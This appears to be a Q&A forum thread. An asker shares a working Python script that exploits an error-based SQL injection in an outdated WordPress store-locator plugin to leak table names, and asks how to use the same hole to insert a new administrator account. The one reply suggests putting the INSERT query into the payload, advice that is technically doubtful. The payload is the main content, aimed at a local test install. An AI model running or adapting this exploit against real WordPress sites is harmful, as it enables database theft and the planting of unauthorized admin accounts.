Isaiah Y
Reputation: 99
Using Python for SQL Injection (WordPress)
As an aspiring network security expert, I have been practicing performing SQL injections on my WordPress installation.
Specifically, I have chosen this vulnerability found in an outdated plugin.
So far I have been able to successfully extract database information using the following code:
import requests,re
url = 'http://localhost/wp-content/plugins/store-locator/sl-xml.php'
params = {
"debug":"1",
"mode":"gen",
"sl_vars[num_initial_displayed]":"2,1 procedure analyse(extractvalue(rand(),concat(0x3a,(select concat(0x3a,table_name) from information_schema.tables limit 90,1))),1);"
}
r = requests.get(url, params=params)
print re.match(r"Invalid query: XPATH syntax error: ':([^']*)'", r.text).group(1)
Output: wp_users
My next experiment was to add an administrative account through this exploit, but I simply can not seem to figure out how to query it correctly.
These are the necessary parameters:
INSERT INTO `wp_users` (`user_login`, `user_pass`, `user_nicename`, `user_email`, `user_status`)
VALUES ('newadmin', MD5('pass123'), 'firstname lastname', '[email protected]', '0');
Is an 'insert' action even possible through this kind of attack method?
Upvotes: 1
Views: 585
Answers (1)
JCollerton
Reputation: 3307
In params replace select concat(0x3a,table_name) from information_schema.tables limit 90 with your INSERT query.
Upvotes: 1
Related Questions
- Protecting against SQL injection in python
- Python/ SQL Statement - Use of parameters / injection protection?
- SQLAlchemy + SQL Injection
- Python: best practice and securest way to connect to MySQL and execute queries
- Python MySQLdb - Programming Around SQL Injection Code
- How can I prevent SQL injection in PYTHON-DJANGO?
- SQL Injection Prevention in Python - is using parameterized query enough?
- Python SQL Injection safe
- Saving to database to prevent SQL injection in Python
- MySQL in Python, MATCH and injection attack